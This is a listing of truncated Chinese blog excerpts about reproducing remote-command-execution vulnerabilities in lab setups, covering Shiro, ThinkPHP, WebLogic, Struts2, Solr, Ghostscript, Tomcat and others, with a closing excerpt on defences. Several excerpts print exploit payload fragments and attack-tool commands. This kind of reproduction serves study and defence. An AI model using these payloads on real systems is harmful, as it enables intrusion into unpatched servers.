影响版本 Apache Shiro <= 1.2.4 产生原因 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化. 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞. payload 构造 前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cooki…

利用phar实行php反序列化命令执行(测试环境复现) 前言 一般说到反序列化漏洞,第一反应都是unserialize()函数.然而安全研究员Sam Thomas分享了议题”It’s a PHP unserialization vulnerability Jim, but not as we know it”,利用phar伪协议会将用户自定义的meta-data序列化的形式存储这一特性,扩展php反序列化的攻击面. phar介绍 简单来说phar就是php压缩文档.它可以把多个文件归档到同一个文…

本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程 仅供学习 文中利用到漏洞环境由phith0n维护: JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 靶机地址:192.168.1.102  服务端口:8080 测试机: 192.168.1.100 搭建好环境,访问地址:http://192.168.1.102:8080/ 及 http://192.168.1.102:8080/invoker/readonly    响应码500,证明漏洞存…

CVE-2017-5645 Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) 一.漏洞原理 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器.Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞.攻击者可利用该漏洞执行任意代码. 二.环境搭建 cd /vulhub/log4j/CVE-2017-5645 #进入环境目录 docker-compose build && docker-compose up…

Apache SSI 远程命令执行漏洞复现 一.漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令. 使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术.默认扩展名是 .stm..shtm 和 .shtml.…

ThinkPHP 5.x远程命令执行漏洞复现 一.漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1. 二.漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.…

1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家. 1月17日,CNVD公开了D-LinkDIR 615/645/815 service.cgi远程命令执行漏洞(CNVD-2018-01084).由于笔者近期对网络设备进行渗透技术略有研究,便复现了一下该漏洞. 1.2 漏洞描述 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令…

楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了 一.thinkphp5.X系列 1.安装composer yum -y install composer 安装php拓展 yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -y 2.切换目录到/var/www/html cd /var…

本文首发于先知: https://xz.aliyun.com/t/6493 0x01.漏洞复现 环境配置 https://github.com/Medicean/VulApps/tree/master/s/shiro/1 测试 需要一个vps ip提供rmi注册表服务,此时需要监听vps的1099端口,复现中以本机当作vps使用 poc: import sys import uuid import base64 import subprocess from Crypto.Cipher impor…

命令执行 java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success" 登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送 登录Apereo CAS,touch /tmp/success已成功执行…

影响范围 Liferay Portal 6.1.X Liferay Portal 6.2.X Liferay Portal 7.0.X Liferay Portal 7.1.X Liferay Portal 7.2.X 漏洞复现 准备一个恶意的Java类,编译 public class reverse { static { try { String[] cmd = {"bash", "-c", "touch /tmp/success"}; jav…

漏洞描述: 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052).Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击 漏洞编号: CVE编号:CVE-2017-9805 漏洞复现: 利用弹出计算…

  0x00 简介 北京时间10月17日,Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191).该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行. 0x01 漏洞复现 目标weblogci服务器已开放了T3服务,该服务器是部署在linux下,可以用https://github…

0x00 漏洞背景 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 0x01 影响范围 Apache Solr < 8.2.0 0x02 环境搭建 下载地址https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip 在本地解压,进入solr-7.7.2目录,执行命令 bin/solr -e dih (前提:java环境) 然后访问http://localh…

0x01 漏洞简介 Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现.此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据.它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置.由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行. 0x02 环境搭建 我这里使…

一.漏洞描述 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架.Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令. 二.漏洞环境搭建 需要准备的工具如下: 1.docker+vulhub漏洞库 2.Burpsuite 3.靶机Ubuntu18.04虚拟机(其他也可以) 打开Ubuntu虚拟机…

漏洞概述 Apache Druid 是一个分布式的数据处理系统.Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码.在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码.攻击者可直接构造恶意请求执行任意代码,控制服务器. 影响版本 Apache Druid < 0.20.1 环境搭建 docker pull fokkodriesprong/docker-druid docker run --rm -…

漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0   直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令"whoami" 绕过方式: 1.unicode编码 2.字符串拼接 bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"…

版权声明:本文为博主的原创文章,未经博主同意不得转载 前言 记录下自己的复现,保留意见 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,分别存在于LNK文件和Windows Search功能中.黑客可以通过U盘.网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 概述 微软的Patch Tuesday更新发布了多达95个针对Windows.Office.Skype.IE和Edge浏览器的补…

0x01 漏洞简介 Struts在某些情况下可能存在OGNL表达式注入漏洞,如果开发人员使用了 %{-} 语法进行强制OGNL解析,某些特殊的TAG属性可能会被双重解析.攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行 0x02 漏洞影响 apache:struts2:2.0.0 - 2.5.25 0x03 环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-061 下载docker-compose.y…

下载ysoserial,git git clone https://github.com/frohoff/ysoserial.git cd ysoserialmvn clean package -DskipTests cd target/ 执行命令 java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.49.2 1099 BeanShell1 'touch /tmp/succe…

影响版本 - Apache Ofbiz:< 17.12.04 访问 https://192.168.49.2:8443/webtools/control/xmlrpc 抓包 进行数据包修改 payload地址 https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496 使用ysoserial的CommonsBeanutils1来生成Payload 首先对命令进行加密 http://www.jackson-t.ca/runtim…

前言 这个漏洞出来有一段时间了,有人一直复现不成功来问我,就自己复现了下,顺便简单记录下这个漏洞原理,以便后面回忆. 复现过程 网上已经有很多文章了,这里就不在写了.主要记录一下复现过程中遇到的问题 请求报400错误 请求头添加Content-Type: application/json 修改Accept: */* 即可 执行命令不成功 查看rmi和web日志都能看到请求,但是发现命令就是未执行. 靶场环境用的vulhub,里面java版本是openjdk version "1.8.0_102&…

Apache Kylin是一个开源的.分布式的分析型数据仓库,提供Hadoop/Spark之上的 SQL 查询接口及多维分析(OLAP)能力以支持超大规模数据,最初由 eBay 开发并贡献至开源社区.它能在亚秒内查询巨大的表. 0x00 漏洞概述 漏洞编号:CVE-2020-1956. Apache Kylin中存在一些RESTful API,可以将操作系统指令与用户输入的字符串拼接起来.由于未对用户输入内容做充分校验,攻击者可以构造任意系统命令执行. 影响版本: Kylin 2.3.0-2.3…

前言 关于这个漏洞,啥都不用说了,直接发车. 工具下载 JNDIExploit:https://github.com/0x727/JNDIExploit 复现过程 启动靶场环境 直接用vulfocus启一个环境. 官网地址:http://vulfocus.fofa.so/ ​ 没注册的先注册,进来首页即可看到靶场 用JNDIExploit启一个ldap的服务. 命令如下: java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.…

影响的版本 <= 9.23(全版本.全平台) Ubuntu 开启 ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null 依次输入 legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%whoami) currentdevice putdeviceprops showpage 执行结果 poc %!…

影响范围 Apache Tomcat 7.0.0 - 7.0.81 不受影响的版本 Apache Tomcat 8.x Apache Tomcat 9.x 漏洞分析 在Tomcat安装目录下的配置文件web.xml中的org.apache.catalina.servlets.DefaultServlet方法下如果该方法有如下代码,即表示Tomcat已开启PUT方法 <init-param> <param-name>readonly</param-name> <pa…

thinkPHP中反斜杠的作用是类库\命名空间 命令执行的姿势 通过反射invokefunction调用call_user_func_array方法,call_user_func_array函数接受两个参数,第一个为函数名,第二个为函数参数数组,如下所示,通过call_user_func_array函数调用system执行whoami函数 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=syst…

一.     漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”. 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814).WebLogic是美国Oracle公司出品的Java应用服务器,W…

命令执行漏洞防御尽量不要使用系统执行命令在进入执行命令函数方法之前,变量一定要做好过滤,对敏感字符进行转义在使用动态函数之前,确保使用的函数是指定的函数之一对PHP语言来说,不能完全控制的危险函数最好不要使用 RCE远程代码执行的防御使用json保存数组,当读取时就不需要使用eval了对于必须使用eval的地方,一定严格处理用户数据(白名单.黑名单)字符串使用单引号包括可控代码,插入前使用addslashes转义,(addslashes.魔数引号.htmlspecialchars. htmlen…